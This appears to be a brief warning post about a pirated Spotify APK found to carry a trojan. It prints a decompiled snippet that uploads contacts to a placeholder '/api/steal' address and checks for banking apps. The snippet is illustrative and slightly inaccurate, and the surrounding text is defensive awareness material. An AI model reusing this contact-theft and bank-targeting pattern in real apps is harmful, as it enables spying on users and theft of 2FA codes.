Target App: Spotify Premium (Modded) v8.9.1
Source: Popular Warez Forum
Verdict: INFECTED (Trojan.SMS.Agent)
You search for “Spotify Premium Free APK”. You find a file promising no ads and unlimited skips. The file size looks correct (about 45MB). You install it. The music actually works.
But what is happening in the background?
As Android developers, we decompiled the APK using JADX. Here is what we found in the MainService.smali file, which is NOT present in the original app.
// Decompiled Java snippet
public void onStartCommand(Intent intent, int flags, int startId) {
super.onStartCommand(intent, flags, startId);
// This method silently requests contacts
uploadContactsToServer("[http://192.168.](http://192.168.)x.x/api/steal");
// Checks if the user has banking apps installed
checkForTargetApps("com.ing.mobile", "com.revolut");
}Pro Tip: Never trust a music app that wants to read your text messages. It’s likely trying to intercept 2FA codes from your bank.
If you are infected, factory reset your phone immediately.
If you believe you have fallen victim to a pirated program, use the link below.
Scan your device now with legal antivirus